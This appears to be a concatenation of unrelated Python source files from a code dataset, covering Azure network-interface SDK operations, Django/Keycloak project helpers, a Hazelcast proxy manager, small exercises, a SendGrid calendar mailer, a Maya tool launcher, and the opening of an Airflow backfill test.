response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def begin_list_effective_network_security_groups(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Gets all network security groups applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either EffectiveNetworkSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_01_01.models.EffectiveNetworkSecurityGroupListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveNetworkSecurityGroupListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._list_effective_network_security_groups_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets information about all network interfaces in a virtual machine in a virtual machine scale
set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'} # type: ignore
def list_virtual_machine_scale_set_network_interfaces(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'} # type: ignore
def get_virtual_machine_scale_set_network_interface(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
"""Get the specified network interface in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_01_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
# Construct URL
url = self.get_virtual_machine_scale_set_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_virtual_machine_scale_set_ip_configurations(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceIPConfigurationListResult"]
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceIPConfigurationListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_ip_configurations.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_ip_configurations.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations'} # type: ignore
def get_virtual_machine_scale_set_ip_configuration(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
network_interface_name, # type: str
ip_configuration_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterfaceIPConfiguration"
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param ip_configuration_name: The name of the ip configuration.
:type ip_configuration_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterfaceIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceIPConfiguration"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
# Construct URL
url = self.get_virtual_machine_scale_set_ip_configuration.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'ipConfigurationName': self._serialize.url("ip_configuration_name", ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterfaceIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_ip_configuration.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations/{ipConfigurationName}'} # type: ignore
|
py | 7df7e363ceb66e449fd98c8756adb9ef47474d0a | from .exceptions import ProjectCreationException
from django.conf import settings
import base64
import requests as r
import yaml
import re
import time
import modules.keycloak_lib as keylib
from .tasks import create_keycloak_client_task, create_helm_resources_task
def urlify(s):
# Remove all non-word characters (everything except numbers and letters)
s = re.sub(r"[^\w\s]", '', s)
# Replace all runs of whitespace with a single dash
s = re.sub(r"\s+", '-', s)
return s
def create_project_resources(project, username, repository=None):
res1 = create_keycloak_client_task.delay(project.slug, username, [])
res2 = create_helm_resources_task.delay(project.slug, project.project_key, project.project_secret, repository)
# Wait for keycloak task to finish before returning (otherwise user wouldn't have
# correct Keycloak roles)
while not res1.ready():
time.sleep(0.1)
def delete_project_resources(project):
retval = r.get(settings.CHART_CONTROLLER_URL + '/delete?release={}'.format(str(project.slug)))
if retval:
# Delete Keycloak project client
kc = keylib.keycloak_init()
keylib.keycloak_delete_client(kc, project.slug)
scope_id = keylib.keycloak_get_client_scope_id(kc, project.slug+'-scope')
keylib.keycloak_delete_client_scope(kc, scope_id)
return True
return False
def get_minio_keys(project):
return {
'project_key': decrypt_key(project.project_key),
'project_secret': decrypt_key(project.project_secret)
}
def decrypt_key(key):
base64_bytes = key.encode('ascii')
result = base64.b64decode(base64_bytes)
return result.decode('ascii')
|
py | 7df7e58153bebb8d522a4cb6421674396f7656eb | from django.http import HttpResponse
from django.template import Context, Template
from gaeapi.appengine.api import users
def test(request):
t = Template('Test view')
c = Context({'user': request.user,
'is_admin': users.is_current_user_admin()})
return HttpResponse(t.render(c))
|
py | 7df7e5f7c9c2b9ad8f15ed56cf0ffca3e832dcc0 | from hazelcast.protocol.codec import client_create_proxy_codec, client_destroy_proxy_codec
from hazelcast.proxy.atomic_long import AtomicLong
from hazelcast.proxy.atomic_reference import AtomicReference
from hazelcast.proxy.count_down_latch import CountDownLatch
from hazelcast.proxy.executor import Executor
from hazelcast.proxy.id_generator import IdGenerator
from hazelcast.proxy.list import List
from hazelcast.proxy.lock import Lock
from hazelcast.proxy.map import create_map_proxy
from hazelcast.proxy.multi_map import MultiMap
from hazelcast.proxy.queue import Queue
from hazelcast.proxy.reliable_topic import ReliableTopic
from hazelcast.proxy.replicated_map import ReplicatedMap
from hazelcast.proxy.ringbuffer import Ringbuffer
from hazelcast.proxy.semaphore import Semaphore
from hazelcast.proxy.set import Set
from hazelcast.proxy.topic import Topic
from hazelcast.proxy.pn_counter import PNCounter
from hazelcast.proxy.flake_id_generator import FlakeIdGenerator
ATOMIC_LONG_SERVICE = "hz:impl:atomicLongService"
ATOMIC_REFERENCE_SERVICE = "hz:impl:atomicReferenceService"
COUNT_DOWN_LATCH_SERVICE = "hz:impl:countDownLatchService"
ID_GENERATOR_SERVICE = "hz:impl:idGeneratorService"
EXECUTOR_SERVICE = "hz:impl:executorService"
LOCK_SERVICE = "hz:impl:lockService"
LIST_SERVICE = "hz:impl:listService"
MULTI_MAP_SERVICE = "hz:impl:multiMapService"
MAP_SERVICE = "hz:impl:mapService"
RELIABLE_TOPIC_SERVICE = "hz:impl:reliableTopicService"
REPLICATED_MAP_SERVICE = "hz:impl:replicatedMapService"
RINGBUFFER_SERIVCE = "hz:impl:ringbufferService"
SEMAPHORE_SERVICE = "hz:impl:semaphoreService"
SET_SERVICE = "hz:impl:setService"
QUEUE_SERVICE = "hz:impl:queueService"
TOPIC_SERVICE = "hz:impl:topicService"
PN_COUNTER_SERVICE = "hz:impl:PNCounterService"
FLAKE_ID_GENERATOR_SERVICE = "hz:impl:flakeIdGeneratorService"
ID_GENERATOR_ATOMIC_LONG_PREFIX = "hz:atomic:idGenerator:"
_proxy_init = {
ATOMIC_LONG_SERVICE: AtomicLong,
ATOMIC_REFERENCE_SERVICE: AtomicReference,
COUNT_DOWN_LATCH_SERVICE: CountDownLatch,
ID_GENERATOR_SERVICE: IdGenerator,
EXECUTOR_SERVICE: Executor,
LIST_SERVICE: List,
LOCK_SERVICE: Lock,
MAP_SERVICE: create_map_proxy,
MULTI_MAP_SERVICE: MultiMap,
QUEUE_SERVICE: Queue,
RELIABLE_TOPIC_SERVICE: ReliableTopic,
REPLICATED_MAP_SERVICE: ReplicatedMap,
RINGBUFFER_SERIVCE: Ringbuffer,
SEMAPHORE_SERVICE: Semaphore,
SET_SERVICE: Set,
TOPIC_SERVICE: Topic,
PN_COUNTER_SERVICE: PNCounter,
FLAKE_ID_GENERATOR_SERVICE: FlakeIdGenerator
}
class ProxyManager(object):
def __init__(self, client):
self._client = client
self._proxies = {}
def get_or_create(self, service_name, name, **kwargs):
ns = (service_name, name)
if ns in self._proxies:
return self._proxies[ns]
proxy = self.create_proxy(service_name, name, **kwargs)
self._proxies[ns] = proxy
return proxy
def create_proxy(self, service_name, name, **kwargs):
message = client_create_proxy_codec.encode_request(name=name, service_name=service_name,
target=self._find_next_proxy_address())
self._client.invoker.invoke_on_random_target(message).result()
return _proxy_init[service_name](client=self._client, service_name=service_name, name=name, **kwargs)
def destroy_proxy(self, service_name, name):
ns = (service_name, name)
try:
self._proxies.pop(ns)
message = client_destroy_proxy_codec.encode_request(name=name, service_name=service_name)
self._client.invoker.invoke_on_random_target(message).result()
return True
except KeyError:
return False
def _find_next_proxy_address(self):
# TODO: filter out lite members
return self._client.load_balancer.next_address()
|
py | 7df7e802d928f854d81cc5fde90ec5140d09b768 | """
Given n, how many structurally unique BST's (binary search trees) can store values 1 ... n?
Example:
Input: 3, Output: 5
Explanation:
Given n = 3, there are a total of 5 unique BST's:
1 3 3 2 1
\ / / / \ \
3 2 1 1 3 2
/ / \ \
2 1 2 3
"""
"""
This problem is equivalent to finding the Catalan numbers: https://en.wikipedia.org/wiki/Catalan_number. Once this has
been recognised we can implement that formula directly.
"""
from math import factorial
def num_trees(n):
return factorial(2*n) // (factorial(n+1) * factorial(n))
assert num_trees(3) == 5
|
py | 7df7e85a1689cebaa6f1dbc227b951f915c7b48a | import turtle
opcaoCor = input("Qual a cor de fundo do jogo? \n1. Branco\n2.Verde\n")
janela = turtle.Screen()
if (opcaoCor == "1"):
janela.bgcolor("white") # muda a cor do background da janela p/ branca
elif (opcaoCor == "2"):
janela.bgcolor("lightgreen") # muda a cor do background da janela p/verde
else:
print("Opção inválida. Cor rosa será usada")
janela.bgcolor("pink")
alex = turtle.Turtle() # cria a tartaruga alex
alex.shape("turtle")
alex.color("blue") # muda a cor da tartaruga
alex.speed(1) # muda a velocidade da tartaruga [0-10]
alex.forward(80) # manda alex andar 80 unidades pra frente
alex.left(90) # manda alex virar 90 graus para esquerda
alex.forward(80)
alex.left(90)
alex.forward(80)
alex.left(90)
alex.forward(80)
alex.left(90)
alex.color("gray") # muda a cor de alex
for k in range(4): # repita 4 vezes o código abaixo
alex.forward(80) # manda alex andar 80 unidades pra frente
alex.left(90) # manda alex virar 90 graus para a esquerda
janela.exitonclick() |
py | 7df7e8878c496cae7ee7fa563d7b8aad6dafc700 | import copy
import os
from dotenv import load_dotenv
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import (Attachment, Disposition, FileContent,
FileName, FileType, Mail)
from input_output import GSpreadAuthentication
from problem_solving import KandGProblem
from read_df import csvtodf, makeical
def main(path_input=None, dir_output=None, direct_in=False, local=False):
if direct_in:
if local:
# Google API秘密鍵のパスを入力
json_keyfile_name = "hoge/key_file_name.json"
# https://docs.google.com/spreadsheets/d/xxx/....のxxx部分を入力
spreadsheet_key = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
spreadsheet = GSpreadAuthentication(json_keyfile_name, spreadsheet_key)
else:
spreadsheet = GSpreadAuthentication()
df_kagisime, df_gomisute = spreadsheet.InputSchedule()
else:
path_input = input("Please enter path of schedule csv file:\n") if path_input is None else path_input
csvdata = csvtodf(path_input)
df_kagisime, df_gomisute = csvdata.df_input()
model = KandGProblem(df_kagisime, df_gomisute)
df_output = model.solve()
print(df_output)
print(df_output.index[0])
for name, series in df_output.iteritems():
print(name, series[5])
making_ical = makeical(df_output)
if direct_in:
spreadsheet.UpdateSpreadsheet(df_output)
mail_content_temp = spreadsheet.GetDecidedMailTemplate()
mail_content = copy.deepcopy(mail_content_temp)
print('mail_content', mail_content)
print('mail_content_temp', mail_content_temp, '\n\n')
if local:
df_output.to_csv(os.path.join(dir_output, csvdata.yyyymm + ' 配置.csv'), encoding='utf_8_sig')
dir_output = "./example" if dir_output is None else dir_output
if not (os.path.isdir(dir_output)):
os.mkdir(dir_output)
# .icsファイルを各メンバーごとに作成
for to_mail, fname in zip(spreadsheet.to_mails, spreadsheet.FName):
member = to_mail[1]
encoded_file = making_ical.convert(member, fname) # ゴミ捨てに登録されている全員のicsファイルを作成
mail_content['PlainTextContent'] = mail_content_temp['PlainTextContent'].replace('recipient', member)
if direct_in:
send_mail(encoded_file, to_mail, mail_content, spreadsheet.yyyymm+'_'+fname)
else:
with open(os.path.join(dir_output, csvdata.yyyymm+'_'+fname + '.ics'), mode='wb') as f:
f.write(encoded_file)
def send_mail(encoded_file, to_mail, mail_content, icsfilename):
attachedfile = Attachment(
FileContent(encoded_file),
FileName(icsfilename+'.ics'),
FileType('application/ics'),
Disposition('attachment')
)
to_emails = list((to_mail, tuple(os.environ['FROM_MAIL'].split())))
message = Mail(
from_email=tuple(os.environ['FROM_MAIL'].split()),
to_emails=to_emails,
subject=mail_content['Title'],
plain_text_content=mail_content['PlainTextContent'],
is_multiple=True)
message.attachment = attachedfile
try:
sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
print(to_emails)
response = sg.send(message)
print(response.status_code)
print(response.body)
print(response.headers)
except Exception as e:
print(e.message)
if __name__ == '__main__':
load_dotenv(verbose=True)
dotenv_path = './.env'
load_dotenv(dotenv_path)
print(os.environ['EXAMPLE'])
path_input = "./example/GSS_test - 202111 予定表.csv" # Type path of schedule table csv file downloaded from spreadsheet unless direct_in=True.
dir_output = "./example" # Type path of output file(.ical, 予定表.csv).
main(path_input=None, dir_output=None, direct_in=True, local=False)
|
py | 7df7e8d08d80d5605a0cf00b27b9c3705c69a14a | # coding:utf-8
# --author-- binglu.wang
import zfused_maya.widgets.window as win
import zfused_maya.core.resource as resource
from zfused_maya.node.core.upload_asset import *
uiPath = resource.get("uis", "upload_asset.ui")
mainWindow = win.Window()
mainWindow.central_widget.setStyleSheet("background-color:#444444;")
mainWindow.set_title_name(u"upload_asset")
mainWindow.setFixedSize(680+15,550+55)
qtWinInst = Upload(uiPath,"上传资产(upload_asset)")
mainWindow.set_central_widget(qtWinInst.ui)
if __name__ == '__main__':
mainWindow.show()
|
py | 7df7eb8909a065b4a66b6a8dab90f3919d3e5b8a | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import logging
import multiprocessing
import os
import shutil
import six
import threading
import time
import unittest
from tempfile import mkdtemp
from airflow import AirflowException, settings, models
from airflow.bin import cli
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.net import get_hostname
from mock import Mock, patch, MagicMock, PropertyMock
from sqlalchemy.orm.session import make_transient
from tests.executors.test_executor import TestExecutor
from tests.core import TEST_DAG_FOLDER
from airflow import configuration
configuration.load_test_config()
import sqlalchemy
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
# Include the words "airflow" and "dag" in the file contents, tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
